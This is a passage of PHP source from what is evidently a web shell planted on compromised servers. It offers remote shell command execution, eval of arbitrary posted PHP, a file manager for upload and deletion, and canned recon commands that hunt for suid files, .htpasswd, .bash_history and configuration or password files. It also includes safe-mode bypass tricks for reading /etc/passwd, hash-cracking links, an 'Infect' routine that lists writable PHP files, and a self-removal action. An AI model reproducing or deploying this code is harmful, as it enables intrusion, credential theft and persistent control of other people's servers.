539 case 9: $h[2] .= ' '; break;
540 case 10: $h[2] .= ' '; break;
541 case 13: $h[2] .= ' '; break;
542 default: $h[2] .= $c[$i]; break;
543 }
544 $n++;
545 if ($n == 32) {
546 $n = 0;
547 if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
548 $h[1] .= '<br>';
549 $h[2] .= "\n";
550 }
551 }
552 echo '<table cellspacing=1 cellpadding=5 bgcolor=#222><tr><td bgcolor=#202832><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#060a10><pre>'.$h[1].'</pre></td><td bgcolor=#202832><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
553 break;
554 case 'rename':
555 if( !empty($_POST['p3']) ) {
556 if(!@rename($_POST['p1'], $_POST['p3']))
557 echo 'Can\'t rename!<br>';
558 else
559 die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>');
560 }
561 echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value="submit"></form>';
562 break;
563 case 'touch':
564 if( !empty($_POST['p3']) ) {
565 $time = strtotime($_POST['p3']);
566 if($time) {
567 if(!touch($_POST['p1'],$time,$time))
568 echo 'Fail!';
569 else
570 echo 'Touched!';
571 } else echo 'Bad time format!';
572 }
573 clearstatcache();
574 echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value="submit"></form>';
575 break;
576 /* (С) 12.2015 mitryz */
577 case 'frame':
578 $frameSrc = substr(htmlspecialchars($GLOBALS['cwd']), strlen(htmlspecialchars($_SERVER['DOCUMENT_ROOT'])));
579 if ($frameSrc[0] != '/')
580 $frameSrc = '/' . $frameSrc;
581 if ($frameSrc[strlen($frameSrc) - 1] != '/')
582 $frameSrc = $frameSrc . '/';
583 $frameSrc = $frameSrc . htmlspecialchars($_POST['p1']);
584 echo '<iframe width="100%" height="900px" scrolling="no" src='.$frameSrc.' onload="onload=height=contentDocument.body.scrollHeight"></iframe>';
585 break;
586 }
587 echo '</div>';
588 hardFooter();
589}
590if($os == 'win')
591 $aliases = array(
592 "List Directory" => "dir",
593 "Find index.php in current dir" => "dir /s /w /b index.php",
594 "Find *config*.php in current dir" => "dir /s /w /b *config*.php",
595 "Show active connections" => "netstat -an",
596 "Show running services" => "net start",
597 "User accounts" => "net user",
598 "Show computers" => "net view",
599 "ARP Table" => "arp -a",
600 "IP Configuration" => "ipconfig /all"
601 );
602else
603 $aliases = array(
604 "List dir" => "ls -lha",
605 "list file attributes on a Linux second extended file system" => "lsattr -va",
606 "show opened ports" => "netstat -an | grep -i listen",
607 "process status" => "ps aux",
608 "Find" => "",
609 "find all suid files" => "find / -type f -perm -04000 -ls",
610 "find suid files in current dir" => "find . -type f -perm -04000 -ls",
611 "find all sgid files" => "find / -type f -perm -02000 -ls",
612 "find sgid files in current dir" => "find . -type f -perm -02000 -ls",
613 "find config.inc.php files" => "find / -type f -name config.inc.php",
614 "find config* files" => "find / -type f -name \"config*\"",
615 "find config* files in current dir" => "find . -type f -name \"config*\"",
616 "find all writable folders and files" => "find / -perm -2 -ls",
617 "find all writable folders and files in current dir" => "find . -perm -2 -ls",
618 "find all service.pwd files" => "find / -type f -name service.pwd",
619 "find service.pwd files in current dir" => "find . -type f -name service.pwd",
620 "find all .htpasswd files" => "find / -type f -name .htpasswd",
621 "find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
622 "find all .bash_history files" => "find / -type f -name .bash_history",
623 "find .bash_history files in current dir" => "find . -type f -name .bash_history",
624 "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
625 "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
626 "Locate" => "",
627 "locate httpd.conf files" => "locate httpd.conf",
628 "locate vhosts.conf files" => "locate vhosts.conf",
629 "locate proftpd.conf files" => "locate proftpd.conf",
630 "locate psybnc.conf files" => "locate psybnc.conf",
631 "locate my.conf files" => "locate my.conf",
632 "locate admin.php files" =>"locate admin.php",
633 "locate cfg.php files" => "locate cfg.php",
634 "locate conf.php files" => "locate conf.php",
635 "locate config.dat files" => "locate config.dat",
636 "locate config.php files" => "locate config.php",
637 "locate config.inc files" => "locate config.inc",
638 "locate config.inc.php" => "locate config.inc.php",
639 "locate config.default.php files" => "locate config.default.php",
640 "locate config* files " => "locate config",
641 "locate .conf files"=>"locate '.conf'",
642 "locate .pwd files" => "locate '.pwd'",
643 "locate .sql files" => "locate '.sql'",
644 "locate .htpasswd files" => "locate '.htpasswd'",
645 "locate .bash_history files" => "locate '.bash_history'",
646 "locate .mysql_history files" => "locate '.mysql_history'",
647 "locate .fetchmailrc files" => "locate '.fetchmailrc'",
648 "locate backup files" => "locate backup",
649 "locate dump files" => "locate dump",
650 "locate priv files" => "locate priv"
651 );
652function actionConsole() {
653 if(!empty($_POST['p1']) && !empty($_POST['p2'])) {
654 prototype(md5($_SERVER['HTTP_HOST']).'stderr_to_out', true);
655 $_POST['p1'] .= ' 2>&1';
656 } elseif(!empty($_POST['p1']))
657 prototype(md5($_SERVER['HTTP_HOST']).'stderr_to_out', 0);
658 if(isset($_POST['ajax'])) {
659 prototype(md5($_SERVER['HTTP_HOST']).'ajax', true);
660 ob_start();
661 echo "d.cf.cmd.value='';\n";
662 $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\'\0"));
663 if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) {
664 if(@chdir($match[1])) {
665 $GLOBALS['cwd'] = @getcwd();
666 echo "c_='".$GLOBALS['cwd']."';";
667 }
668 }
669 echo "d.cf.output.value+='".$temp."';";
670 echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;";
671 $temp = ob_get_clean();
672 echo strlen($temp), "\n", $temp;
673 exit;
674 }
675 if(empty($_POST['ajax'])&&!empty($_POST['p1']))
676 prototype(md5($_SERVER['HTTP_HOST']).'ajax', 0);
677 hardHeader();
678 echo "<script>
679if(window.Event) window.captureEvents(Event.KEYDOWN);
680var cmds = new Array('');
681var cur = 0;
682function kp(e) {
683 var n = (window.Event) ? e.which : e.keyCode;
684 if(n == 38) {
685 cur--;
686 if(cur>=0)
687 document.cf.cmd.value = cmds[cur];
688 else
689 cur++;
690 } else if(n == 40) {
691 cur++;
692 if(cur < cmds.length)
693 document.cf.cmd.value = cmds[cur];
694 else
695 cur--;
696 }
697}
698function add(cmd) {
699 cmds.pop();
700 cmds.push(cmd);
701 cmds.push('');
702 cur = cmds.length-1;
703}
704</script>";
705 echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\'clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');} return false;"><label><select name=alias>';
706 foreach($GLOBALS['aliases'] as $n => $v) {
707 if($v == '') {
708 echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>';
709 continue;
710 }
711 echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>';
712 }
713
714 echo '</select></label><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}" value="submit"> <nobr><input type=checkbox name=ajax value=1 '.(@$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX <input type=checkbox name=show_errors value=1 '.(!empty($_POST['p2'])||$_COOKIE[md5($_SERVER['HTTP_HOST']).'stderr_to_out']?'checked':'').'> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin-top:5px;" readonly>';
715 if(!empty($_POST['p1'])) {
716 echo htmlspecialchars("$ ".$_POST['p1']."\n".ex($_POST['p1']));
717 }
718 echo '</textarea><table style="border:1px solid #060a10;background-color:#060a10;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td style="padding-left:4px; width:13px;">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>';
719 echo '</form></div><script>d.cf.cmd.focus();</script>';
720 hardFooter();
721}
722function actionPhp() {
723 if( isset($_POST['ajax']) ) {
724 $_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
725 ob_start();
726 eval($_POST['p1']);
727 $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
728 echo strlen($temp), "\n", $temp;
729 exit;
730 }
731 hardHeader();
732 if( isset($_POST['p2']) && ($_POST['p2'] == 'info') ) {
733 echo '<h1>PHP info</h1><div class=content>';
734 ob_start();
735 phpinfo();
736 $tmp = ob_get_clean();
737 $tmp = preg_replace('!body {.*}!msiU','',$tmp);
738 $tmp = preg_replace('!a:\w+ {.*}!msiU','',$tmp);
739 $tmp = preg_replace('!h1!msiU','h2',$tmp);
740 $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
741 $tmp = preg_replace('!body, td, th, h2, h2 {.*}!msiU','',$tmp);
742 echo $tmp;
743 echo '</div><br>';
744 }
745 if(empty($_POST['ajax'])&&!empty($_POST['p1']))
746 $_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
747 echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);}else{g(null,null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">';
748 echo ' <input type=checkbox name=ajax value=1 '.($_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
749 if(!empty($_POST['p1'])) {
750 ob_start();
751 eval($_POST['p1']);
752 echo htmlspecialchars(ob_get_clean());
753 }
754 echo '</pre></div>';
755 hardFooter();
756}
757function actionFilesMan() {
758 if (!empty ($_COOKIE['f']))
759 $_COOKIE['f'] = @unserialize($_COOKIE['f']);
760
761 if(!empty($_POST['p1'])) {
762 switch($_POST['p1']) {
763 case 'uploadFile':
764 if ( is_array($_FILES['f']['tmp_name']) ) {
765 foreach ( $_FILES['f']['tmp_name'] as $i => $tmpName ) {
766 if(!@move_uploaded_file($tmpName, $_FILES['f']['name'][$i])) {
767 echo "Can't upload file!";
768 }
769 }
770 }
771 break;
772 case 'mkdir':
773 if(!@mkdir($_POST['p2']))
774 echo "Can't create new dir";
775 break;
776 case 'delete':
777 function deleteDir($path) {
778 $path = (substr($path,-1)=='/') ? $path:$path.'/';
779 $dh = opendir($path);
780 while ( ($▟ = readdir($dh) ) !== false) {
781 $▟ = $path.$▟;
782 if ( (basename($▟) == "..") || (basename($▟) == ".") )
783 continue;
784 $type = filetype($▟);
785 if ($type == "dir")
786 deleteDir($▟);
787 else
788 @unlink($▟);
789 }
790 closedir($dh);
791 @rmdir($path);
792 }
793 if(is_array(@$_POST['f']))
794 foreach($_POST['f'] as $f) {
795 if($f == '..')
796 continue;
797 $f = urldecode($f);
798 if(is_dir($f))
799 deleteDir($f);
800 else
801 @unlink($f);
802 }
803 break;
804 case 'paste':
805 if($_COOKIE['act'] == 'copy') {
806 function copy_paste($c,$s,$d){
807 if(is_dir($c.$s)){
808 mkdir($d.$s);
809 $h = @opendir($c.$s);
810 while (($f = @readdir($h)) !== false)
811 if (($f != ".") and ($f != ".."))
812 copy_paste($c.$s.'/',$f, $d.$s.'/');
813 } elseif(is_file($c.$s))
814 @copy($c.$s, $d.$s);
815 }
816 foreach($_COOKIE['f'] as $f)
817 copy_paste($_COOKIE['c'],$f, $GLOBALS['cwd']);
818 } elseif($_COOKIE['act'] == 'move') {
819 function move_paste($c,$s,$d){
820 if(is_dir($c.$s)){
821 mkdir($d.$s);
822 $h = @opendir($c.$s);
823 while (($f = @readdir($h)) !== false)
824 if (($f != ".") and ($f != ".."))
825 copy_paste($c.$s.'/',$f, $d.$s.'/');
826 } elseif(@is_file($c.$s))
827 @copy($c.$s, $d.$s);
828 }
829 foreach($_COOKIE['f'] as $f)
830 @rename($_COOKIE['c'].$f, $GLOBALS['cwd'].$f);
831 } elseif($_COOKIE['act'] == 'zip') {
832 if(class_exists('ZipArchive')) {
833 $zip = new ZipArchive();
834 if ($zip->open($_POST['p2'], 1)) {
835 chdir($_COOKIE['c']);
836 foreach($_COOKIE['f'] as $f) {
837 if($f == '..')
838 continue;
839 if(@is_file($_COOKIE['c'].$f))
840 $zip->addFile($_COOKIE['c'].$f, $f);
841 elseif(@is_dir($_COOKIE['c'].$f)) {
842 $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/', FilesystemIterator::SKIP_DOTS));
843 foreach ($iterator as $key=>$value) {
844 $zip->addFile(realpath($key), $key);
845 }
846 }
847 }
848 chdir($GLOBALS['cwd']);
849 $zip->close();
850 }
851 }
852 } elseif($_COOKIE['act'] == 'unzip') {
853 if(class_exists('ZipArchive')) {
854 $zip = new ZipArchive();
855 foreach($_COOKIE['f'] as $f) {
856 if($zip->open($_COOKIE['c'].$f)) {
857 $zip->extractTo($GLOBALS['cwd']);
858 $zip->close();
859 }
860 }
861 }
862 } elseif($_COOKIE['act'] == 'tar') {
863 chdir($_COOKIE['c']);
864 $_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']);
865 ex('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_COOKIE['f']));
866 chdir($GLOBALS['cwd']);
867 }
868 unset($_COOKIE['f']);
869 setcookie('f', '', time() - 3600);
870 break;
871 default:
872 if(!empty($_POST['p1'])) {
873 prototype('act', $_POST['p1']);
874 prototype('f', serialize(@$_POST['f']));
875 prototype('c', @$_POST['c']);
876 }
877 break;
878 }
879 }
880 hardHeader();
881 echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>';
882 $dirContent = hardScandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
883 if($dirContent === false) { echo 'Can\'t open this folder!';hardFooter(); return; }
884 global $sort;
885 $sort = array('name', 1);
886 if(!empty($_POST['p1'])) {
887 if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))
888 $sort = array($match[1], (int)$match[2]);
889 }
890echo "<script>
891 function sa() {
892 for(i=0;i<d.files.elements.length;i++)
893 if(d.files.elements[i].type == 'checkbox')
894 d.files.elements[i].checked = d.files.elements[0].checked;
895 }
896</script>
897<table width='100%' class='main' cellspacing='0' cellpadding='2'>
898<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>";
899 $dirs = $files = array();
900 $n = count($dirContent);
901 for($i=0;$i<$n;$i++) {
902 $ow = @posix_getpwuid(@fileowner($dirContent[$i]));
903 $gr = @posix_getgrgid(@filegroup($dirContent[$i]));
904 $tmp = array('name' => $dirContent[$i],
905 'path' => $GLOBALS['cwd'].$dirContent[$i],
906 'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])),
907 'perms' => viewPermsColor($GLOBALS['cwd'] . $dirContent[$i]),
908 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
909 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),
910 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])
911 );
912 if(@is_file($GLOBALS['cwd'] . $dirContent[$i]))
913 $files[] = array_merge($tmp, array('type' => 'file'));
914 elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i]))
915 $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));
916 elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i])&&($dirContent[$i] != "."))
917 $dirs[] = array_merge($tmp, array('type' => 'dir'));
918 }
919 $GLOBALS['sort'] = $sort;
920 function cmp($a, $b) {
921 if($GLOBALS['sort'][0] != 'size')
922 return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1);
923 else
924 return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
925 }
926 usort($files, "cmp");
927 usort($dirs, "cmp");
928 $files = array_merge($dirs, $files);
929 $l = 0;
930 foreach($files as $f) {
931 echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');" ' . (empty ($f['link']) ? '' : "title='{$f['link']}'") . '><b>[ ' . htmlspecialchars($f['name']) . ' ]</b>').'</a></td><td>'.(($f['type']=='file')?viewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms']
932 .'</td><td><a class="tooltip" data-tooltip="Rename" href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a class="tooltip" data-tooltip="Touch" href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a class="tooltip" data-tooltip="Frame" href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'frame\')">F</a> <a class="tooltip" data-tooltip="Edit" href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a class="tooltip" data-tooltip="Download" href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>';
933 $l = $l?0:1;
934 }
935 echo "<tr id=fak><td colspan=7>
936 <input type=hidden name=ne value=''>
937 <input type=hidden name=a value='FilesMan'>
938 <input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'>
939 <input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'')."'>
940 <label><select name='p1'>";
941 if(!empty($_COOKIE['act']) && @count($_COOKIE['f']))
942 echo "<option value='paste'>↳ Paste</option>";
943 echo "<option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>";
944 if(class_exists('ZipArchive'))
945 echo "<option value='zip'>+ zip</option><option value='unzip'>- zip</option>";
946 echo "<option value='tar'>+ tar.gz</option>";
947 echo "</select></label>";
948 if(!empty($_COOKIE['act']) && @count($_COOKIE['f']) && (($_COOKIE['act'] == 'zip') || ($_COOKIE['act'] == 'tar')))
949 echo " file name: <input type=text name=p2 value='hard_" . date("Ymd_His") . "." . ($_COOKIE['act'] == 'zip'?'zip':'tar.gz') . "'> ";
950 echo "<input type='submit' value='submit'></td></tr></form></table></div>";
951 hardFooter();
952}
953function actionStringTools() {
954 if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
955 if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}}
956 if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}
957 if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= sprintf('%02X',ord($p[$i]));return strtoupper($r);}}
958 if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
959 $stringTools = array(
960 'Base64 encode' => 'base64_encode',
961 'Base64 decode' => 'base64_decode',
962 'Url encode' => 'urlencode',
963 'Url decode' => 'urldecode',
964 'Full urlencode' => 'full_urlencode',
965 'md5 hash' => 'md5',
966 'sha1 hash' => 'sha1',
967 'crypt' => 'crypt',
968 'CRC32' => 'crc32',
969 'ASCII to HEX' => 'ascii2hex',
970 'HEX to ASCII' => 'hex2ascii',
971 'HEX to DEC' => 'hexdec',
972 'HEX to BIN' => 'hex2bin',
973 'DEC to HEX' => 'dechex',
974 'DEC to BIN' => 'decbin',
975 'BIN to HEX' => 'binhex',
976 'BIN to DEC' => 'bindec',
977 'String to lower case' => 'strtolower',
978 'String to upper case' => 'strtoupper',
979 'Htmlspecialchars' => 'htmlspecialchars',
980 'String length' => 'strlen',
981 );
982 if(isset($_POST['ajax'])) {
983 prototype(md5($_SERVER['HTTP_HOST']).'ajax', true);
984 ob_start();
985 if(in_array($_POST['p1'], $stringTools))
986 echo $_POST['p1']($_POST['p2']);
987 $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
988 echo strlen($temp), "\n", $temp;
989 exit;
990 }
991 if(empty($_POST['ajax'])&&!empty($_POST['p1']))
992 prototype(md5($_SERVER['HTTP_HOST']).'ajax', 0);
993 hardHeader();
994 echo '<h1>String conversions</h1><div class=content>';
995 echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><label><select name='selectTool'>";
996 foreach($stringTools as $k => $v)
997 echo "<option value='".htmlspecialchars($v)."'>".$k."</option>";
998 echo "</select></label><input type='submit' value='submit'/> <input type=checkbox name=ajax value=1 ".(@$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".(empty($_POST['p1'])?'':htmlspecialchars(@$_POST['p2']))."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>";
999 if(!empty($_POST['p1'])) {
1000 if(in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2']));
1001 }
1002 echo"</pre></div><br><h1>Search files:</h1><div class=content>
1003 <form onsubmit=\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\"><table cellpadding='1' cellspacing='0' width='50%'>
1004 <tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr>
1005 <tr><td>Path:</td><td><input type='text' name='cwd' value='". htmlspecialchars($GLOBALS['cwd']) ."' style='width:100%'></td></tr>
1006 <tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>
1007 <tr><td></td><td><input type='submit' value='submit'></td></tr>
1008 </table></form>";
1009 function hardRecursiveGlob($path) {
1010 if(substr($path, -1) != '/')
1011 $path.='/';
1012 $paths = @array_unique(@array_merge(@glob($path.$_POST['p3']), @glob($path.'*', GLOB_ONLYDIR)));
1013 if(is_array($paths)&&@count($paths)) {
1014 foreach($paths as $▟) {
1015 if(@is_dir($▟)){
1016 if($path!=$▟)
1017 hardRecursiveGlob($▟);
1018 } else {
1019 if(empty($_POST['p2']) || @strpos(file_get_contents($▟), $_POST['p2'])!==false)
1020 echo "<a href='#' onclick='g(\"FilesTools\",null,\"".urlencode($▟)."\", \"view\",\"\")'>".htmlspecialchars($▟)."</a><br>";
1021 }
1022 }
1023 }
1024 }
1025 if(@$_POST['p3'])
1026 hardRecursiveGlob($_POST['c']);
1027 echo "</div><br><h1>Search for hash:</h1><div class=content>
1028 <form method='post' target='_blank' name='hf'>
1029 <input type='text' name='hash' style='width:200px;'><br>
1030 <input type='hidden' name='act' value='find'/>
1031 <input type='submit' value='hashcracking.ru' onclick=\"document.hf.action='https://hashcracking.ru/index.php';document.hf.submit()\"><br>
1032 <input type='submit' value='md5.rednoize.com' onclick=\"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br>
1033 <input type='submit' value='fakenamegenerator.com' onclick=\"document.hf.action='http://www.fakenamegenerator.com/';document.hf.submit()\"><br>
1034 <input type='submit' value='hashcrack.com' onclick=\"document.hf.action='http://www.hashcrack.com/index.php';document.hf.submit()\"><br>
1035 <input type='submit' value='toolki.com' onclick=\"document.hf.action='http://toolki.com/';document.hf.submit()\"><br>
1036 <input type='submit' value='fopo.com.ar' onclick=\"document.hf.action='http://fopo.com.ar/';document.hf.submit()\"><br>
1037 <input type='submit' value='md5decrypter.com' onclick=\"document.hf.action='http://www.md5decrypter.com/';document.hf.submit()\"><br>
1038 </form></div>";
1039 hardFooter();
1040}
1041function actionSafeMode() {
1042 $temp='';
1043 ob_start();
1044 switch($_POST['p1']) {
1045 case 1:
1046 $temp=@tempnam($test, 'cx');
1047 if(@copy("compress.zlib://".$_POST['p2'], $temp)){
1048 echo @file_get_contents($temp);
1049 unlink($temp);
1050 } else
1051 echo 'Sorry... Can\'t open file';
1052 break;
1053 case 2:
1054 $files = glob($_POST['p2'].'*');
1055 if( is_array($files) )
1056 foreach ($files as $filename)
1057 echo $filename."\n";
1058 break;
1059 case 3:
1060 $ch = curl_init("file://".$_POST['p2']."\x00".SELF_PATH);
1061 curl_exec($ch);
1062 break;
1063 case 4:
1064 ini_restore("safe_mode");
1065 ini_restore("open_basedir");
1066 include($_POST['p2']);
1067 break;
1068 case 5:
1069 for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
1070 $uid = @posix_getpwuid($_POST['p2']);
1071 if ($uid)
1072 echo join(':',$uid)."\n";
1073 }
1074 break;
1075 case 6:
1076 if(!function_exists('imap_open'))break;
1077 $stream = imap_open($_POST['p2'], "", "");
1078 if ($stream == FALSE)
1079 break;
1080 echo imap_body($stream, 1);
1081 imap_close($stream);
1082 break;
1083 }
1084 $temp = ob_get_clean();
1085 hardHeader();
1086 echo '<h1>Safe mode bypass</h1><div class=content>';
1087 echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value="submit"></form><br><br><span>Imap_open (read file)</span><form onsubmit=\'g(null,null,"6",this.param.value);return false;\'><input type=text name=param><input type=submit value="submit"></form>';
1088 if($temp)
1089 echo '<pre class="ml1" style="margin-top:5px" id="Output">'.$temp.'</pre>';
1090 echo '</div>';
1091 hardFooter();
1092}
1093function actionLogout() {
1094 setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600);
1095 die('bye!');
1096}
1097function actionSelfRemove() {
1098 if($_POST['p1'] == 'yes')
1099 if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__)))
1100 die('Shell has been removed');
1101 else
1102 echo 'unlink error!';
1103 if($_POST['p1'] != 'yes')
1104 hardHeader();
1105 echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
1106 hardFooter();
1107}
1108function actionInfect() {
1109 hardHeader();
1110 echo '<h1>Infect</h1><div class=content>';
1111 if($_POST['p1'] == 'infect') {
1112 $target=$_SERVER['DOCUMENT_ROOT'];
1113 function ListFiles($dir) {
1114 if($dh = opendir($dir)) {
1115 $files = Array();
1116 $inner_files = Array();
1117 while($file = readdir($dh)) {
1118 if($file != "." && $file != "..") {
1119 if(is_dir($dir . "/" . $file)) {
1120 $inner_files = ListFiles($dir . "/" . $file);
1121 if(is_array($inner_files)) $files = array_merge($files, $inner_files);
1122 } else {
1123 array_push($files, $dir . "/" . $file);
1124 }
1125 }
1126 }
1127 closedir($dh);
1128 return $files;
1129 }
1130 }
1131 foreach (ListFiles($target) as $key=>$file){
1132 $nFile = substr($file, -4, 4);
1133 if($nFile == ".php" ){
1134 if(($file<>$_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF'])&&(is_writeable($file))){
1135 echo "$file<br>";
1136 $i++;
1137 }
1138 }
1139 }
1140 echo "<font color=red size=14>$i</font>";
1141 }else{
1142 echo "<form method=post><input type=submit value=Infect name=infet></form>";
1143 echo 'Really want to infect the server? <a href=# onclick="g(null,null,\'infect\')">Yes</a></div>';
1144 }
1145 hardFooter();
1146}
1147function actionBruteforce() {
1148 hardHeader();
